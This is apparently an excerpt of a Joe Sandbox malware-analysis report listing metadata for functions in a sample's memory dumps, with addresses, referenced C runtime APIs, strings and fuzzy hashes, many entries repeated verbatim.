Instruction ID: 98007568401b8ea6ec545b56f13101d4932c1890a4451c934aea34c286558d9a
Opcode Fuzzy Hash: 342c38b1b2dc153566cf6634e9eb19274f7e3938e841e5da1785daf43d75a014
Instruction Fuzzy Hash: AAB12732904255AFDB218F64CC81BEF7BA5EF59310F144197E504AB382D2BD9DC1C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 003FB6C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 003FB6F7
___except_validate_context_record.LIBVCRUNTIME ref: 003FB6FF
_ValidateLocalCookies.LIBCMT ref: 003FB788
__IsNonwritableInCurrentImage.LIBCMT ref: 003FB7B3
_ValidateLocalCookies.LIBCMT ref: 003FB808

Strings

csm, xrefs: 003FB79D

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 10b403c9223d8456f41e9647b3308a77b0dee8f6ea00827e13fadc7f734673fd
Instruction ID: 20da77df37ae9728b7bce1d2b58390bbe57f5a5b121231f30248eefa9848a1ad
Opcode Fuzzy Hash: 10b403c9223d8456f41e9647b3308a77b0dee8f6ea00827e13fadc7f734673fd
Instruction Fuzzy Hash: B841C674A0020D9BCF11EF69C885ABEBBE5FF84364F158165EA189B392D731ED05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00407DF9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

tU, xrefs: 00407EC1
@U, xrefs: 00407EC8

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID:
String ID: @U$tU
API String ID: 0-1258186807
Opcode ID: eebb1c49c5d3af18dd50786e12d20aa81fa541c8267e2c30151de6f50e6dc55a
Instruction ID: a753723df3b9ab825f62c6ba92848840113cc314a0dcd3aab5319734043f5657
Opcode Fuzzy Hash: eebb1c49c5d3af18dd50786e12d20aa81fa541c8267e2c30151de6f50e6dc55a
Instruction Fuzzy Hash: 6C41D2B1A44604AFD7259F38CC42BAABBA9EB48710F10857FF111EB2C1D679AD418BC5

Uniqueness

Uniqueness Score: -1.00%

Function 003FB6C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 003FB6F7
___except_validate_context_record.LIBVCRUNTIME ref: 003FB6FF
_ValidateLocalCookies.LIBCMT ref: 003FB788
__IsNonwritableInCurrentImage.LIBCMT ref: 003FB7B3
_ValidateLocalCookies.LIBCMT ref: 003FB808

Strings

csm, xrefs: 003FB79D

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 10b403c9223d8456f41e9647b3308a77b0dee8f6ea00827e13fadc7f734673fd
Instruction ID: 20da77df37ae9728b7bce1d2b58390bbe57f5a5b121231f30248eefa9848a1ad
Opcode Fuzzy Hash: 10b403c9223d8456f41e9647b3308a77b0dee8f6ea00827e13fadc7f734673fd
Instruction Fuzzy Hash: B841C674A0020D9BCF11EF69C885ABEBBE5FF84364F158165EA189B392D731ED05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00407DF9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

tU, xrefs: 00407EC1
@U, xrefs: 00407EC8

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID:
String ID: @U$tU
API String ID: 0-1258186807
Opcode ID: eebb1c49c5d3af18dd50786e12d20aa81fa541c8267e2c30151de6f50e6dc55a
Instruction ID: a753723df3b9ab825f62c6ba92848840113cc314a0dcd3aab5319734043f5657
Opcode Fuzzy Hash: eebb1c49c5d3af18dd50786e12d20aa81fa541c8267e2c30151de6f50e6dc55a
Instruction Fuzzy Hash: 6C41D2B1A44604AFD7259F38CC42BAABBA9EB48710F10857FF111EB2C1D679AD418BC5

Uniqueness

Uniqueness Score: -1.00%

Function 0039E040 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0039E077
___except_validate_context_record.LIBVCRUNTIME ref: 0039E07F
_ValidateLocalCookies.LIBCMT ref: 0039E108
__IsNonwritableInCurrentImage.LIBCMT ref: 0039E133
_ValidateLocalCookies.LIBCMT ref: 0039E188

Strings

csm, xrefs: 0039E11D

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 13ba1e0b0dbf568abb9b086d6a978af559d5c583f00b80c7d988df8cab25cc2e
Instruction ID: c5d2a79e0b1a03f1d7fa5a34838062d52897cd9c2d15ddde7d2348186f099f0a
Opcode Fuzzy Hash: 13ba1e0b0dbf568abb9b086d6a978af559d5c583f00b80c7d988df8cab25cc2e
Instruction Fuzzy Hash: 6B41E334A00218EFCF12DF69C885B9EBBB5BF45314F148565E9149F392CB71EA11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003AA0C5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,0000000F,BDB9D09C,?,003AA1D2,00000005,003A9083,?,00000000,0000000F,?,003AA380,00000021,FlsSetValue,003BB1C8), ref: 003AA186

Strings

ext-ms-, xrefs: 003AA130
api-ms-, xrefs: 003AA11C

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 36da8fd5e5e541b0d0a069443dcfac9e504c38500e4db7a7cbb9091dd99c3ff3
Instruction ID: a4ba639b3230284152338c98a5cc6e675ac3fd6a4fd0ac3505b6290466dd916f
Opcode Fuzzy Hash: 36da8fd5e5e541b0d0a069443dcfac9e504c38500e4db7a7cbb9091dd99c3ff3
Instruction Fuzzy Hash: 5421C333A04A15BBCB23AB24DC84A9A776CDF43764F150210FA01A7290DB74ED00C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00396980 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0039698D
std::_Lockit::_Lockit.LIBCPMT ref: 003969AB
std::_Lockit::~_Lockit.LIBCPMT ref: 003969CC
std::_Lockit::~_Lockit.LIBCPMT ref: 00396A1C
std::_Facet_Register.LIBCPMT ref: 00396A46
std::_Lockit::~_Lockit.LIBCPMT ref: 00396A5F

Part of subcall function 00391870: ___std_exception_copy.LIBVCRUNTIME ref: 003918AC

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register___std_exception_copy
String ID:
API String ID: 728164013-0
Opcode ID: aa71523cf2367da24ee1e183bc2fdd2bc78b6ab4bc54c7641ecf8edc07b56e05
Instruction ID: 0df8438ef111d52571fb59a915063b6e8eb94b0ff808fc49752033c440d9d436
Opcode Fuzzy Hash: aa71523cf2367da24ee1e183bc2fdd2bc78b6ab4bc54c7641ecf8edc07b56e05
Instruction Fuzzy Hash: 865136725052119BCF17EF28D881A6BB7A9FB80354F16462DF849DB242EB30ED09C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 00401CDC Relevance: 9.2, Strings: 7, Instructions: 456COMMON

Download Yara Rule

Strings

f, xrefs: 00401DE7
p, xrefs: 00401E34
p, xrefs: 00401DD2
f, xrefs: 00401DCB
p, xrefs: 00401DEE
:, xrefs: 00401DA0
f, xrefs: 00401E2D

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID:
String ID: :$f$f$f$p$p$p
API String ID: 0-1434680307
Opcode ID: 622bd4d929814ddfeb804b5ce89127657612a5b746b292797715c7862fe05437
Instruction ID: 1a3da3fa72c0085edc1ae435eec0de79b92bc29873d060878f3408e38322ea93
Opcode Fuzzy Hash: 622bd4d929814ddfeb804b5ce89127657612a5b746b292797715c7862fe05437
Instruction Fuzzy Hash: A9F1A135A002099ADF248FA4DB4D6EEB772FF41B08F60416BE9117B2C0D7B84E85DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0039ABF3 Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,00391BEF,?,00000001,?,?,00000001,?,00391BEF,?), ref: 0039AC3C
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,00391BEF,?,?), ref: 0039ACA7
LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00391BEF,?,?), ref: 0039ACC4
LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00391BEF,?,?), ref: 0039AD03
LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00391BEF,?,?), ref: 0039AD62
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00391BEF,?,?), ref: 0039AD85

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: d42ecc6142cdbd0742eabd5e2b769c6ca00c4f167dbe2c4a82582e511decd4ec
Instruction ID: 3513cc2df1cd0df936fe36e4e7f1144f49d01326ec9ed79712cf5af2729735fc
Opcode Fuzzy Hash: d42ecc6142cdbd0742eabd5e2b769c6ca00c4f167dbe2c4a82582e511decd4ec
Instruction Fuzzy Hash: AE51D07250061AAFEF229FA4CC41FAB7BA9EF44741F124629F905EA590D730CD00DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 003DE460 Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 003DE49D
std::_Lockit::_Lockit.LIBCPMT ref: 003DE4BF
std::_Lockit::~_Lockit.LIBCPMT ref: 003DE4E7
__Getctype.LIBCPMT ref: 003DE5C5
std::_Facet_Register.LIBCPMT ref: 003DE5F9
std::_Lockit::~_Lockit.LIBCPMT ref: 003DE623

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: b51969a48f599e500b82d6309b25276fc383fd262fd2ac7f9ce1c04f02988e66
Instruction ID: c968e1cd751df7491977e7aa3afeeb0c9864f38dac17754ebdfcc5cd17a38562
Opcode Fuzzy Hash: b51969a48f599e500b82d6309b25276fc383fd262fd2ac7f9ce1c04f02988e66
Instruction Fuzzy Hash: 1C51B8B1D00209CBCB12EF58D9417AEBBF0BB11314F14825EE845AF381EB74AA48DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 003DE460 Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 003DE49D
std::_Lockit::_Lockit.LIBCPMT ref: 003DE4BF
std::_Lockit::~_Lockit.LIBCPMT ref: 003DE4E7
__Getctype.LIBCPMT ref: 003DE5C5
std::_Facet_Register.LIBCPMT ref: 003DE5F9
std::_Lockit::~_Lockit.LIBCPMT ref: 003DE623

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: b51969a48f599e500b82d6309b25276fc383fd262fd2ac7f9ce1c04f02988e66
Instruction ID: c968e1cd751df7491977e7aa3afeeb0c9864f38dac17754ebdfcc5cd17a38562
Opcode Fuzzy Hash: b51969a48f599e500b82d6309b25276fc383fd262fd2ac7f9ce1c04f02988e66
Instruction Fuzzy Hash: 1C51B8B1D00209CBCB12EF58D9417AEBBF0BB11314F14825EE845AF381EB74AA48DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 003E1660 Relevance: 9.1, APIs: 6, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 003E168A
std::_Lockit::_Lockit.LIBCPMT ref: 003E16AC
std::_Lockit::~_Lockit.LIBCPMT ref: 003E16D4
__Getcoll.LIBCPMT ref: 003E179F
std::_Facet_Register.LIBCPMT ref: 003E17E4
std::_Lockit::~_Lockit.LIBCPMT ref: 003E180E

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
String ID:
API String ID: 1184649410-0
Opcode ID: ce5c36eee049610c7891035b4c69d3dbb1e038f83e28ef51f5dee14bfaf62745
Instruction ID: f7c13ce2a3829ae06ff2ba53dbebb840982a916c7024c2157f2a29ab583cb10e
Opcode Fuzzy Hash: ce5c36eee049610c7891035b4c69d3dbb1e038f83e28ef51f5dee14bfaf62745
Instruction Fuzzy Hash: 9C5189B1C01248DFDB02DF59C945BAEBBF4EB50314F248159E819AB381D775AE09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 003E1660 Relevance: 9.1, APIs: 6, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 003E168A
std::_Lockit::_Lockit.LIBCPMT ref: 003E16AC
std::_Lockit::~_Lockit.LIBCPMT ref: 003E16D4
__Getcoll.LIBCPMT ref: 003E179F
std::_Facet_Register.LIBCPMT ref: 003E17E4
std::_Lockit::~_Lockit.LIBCPMT ref: 003E180E

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
String ID:
API String ID: 1184649410-0
Opcode ID: ce5c36eee049610c7891035b4c69d3dbb1e038f83e28ef51f5dee14bfaf62745
Instruction ID: f7c13ce2a3829ae06ff2ba53dbebb840982a916c7024c2157f2a29ab583cb10e
Opcode Fuzzy Hash: ce5c36eee049610c7891035b4c69d3dbb1e038f83e28ef51f5dee14bfaf62745
Instruction Fuzzy Hash: 9C5189B1C01248DFDB02DF59C945BAEBBF4EB50314F248159E819AB381D775AE09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00396410 Relevance: 9.1, APIs: 6, Instructions: 95COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0039641D
std::_Lockit::_Lockit.LIBCPMT ref: 0039643B
std::_Lockit::~_Lockit.LIBCPMT ref: 0039645C
std::_Lockit::~_Lockit.LIBCPMT ref: 003964AC
std::_Facet_Register.LIBCPMT ref: 003964D6
std::_Lockit::~_Lockit.LIBCPMT ref: 003964EF

Part of subcall function 00391870: ___std_exception_copy.LIBVCRUNTIME ref: 003918AC

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register___std_exception_copy
String ID:
API String ID: 728164013-0
Opcode ID: 81741ba0a4d3fb2ecac6ffb8793fd9c8de8d7304d30788211a6cd7042e70b743
Instruction ID: 8de37ca3c95cdc22ef444a8e818e907869ad66551d0e47e324ed7247e4440183
Opcode Fuzzy Hash: 81741ba0a4d3fb2ecac6ffb8793fd9c8de8d7304d30788211a6cd7042e70b743
Instruction Fuzzy Hash: A1215A315042208FCF23EF58E84296AF3A4EF80324F05455DE9459B291DB31FD0ACBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0039E23A Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0039E231,0039BEB8,0039BAF2), ref: 0039E248
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0039E256
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0039E26F
SetLastError.KERNEL32(00000000,0039E231,0039BEB8,0039BAF2), ref: 0039E2C1

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 172404c934a2943d0c5ba09fb46107580345ca12a3a6b588df71c5052e0d528b
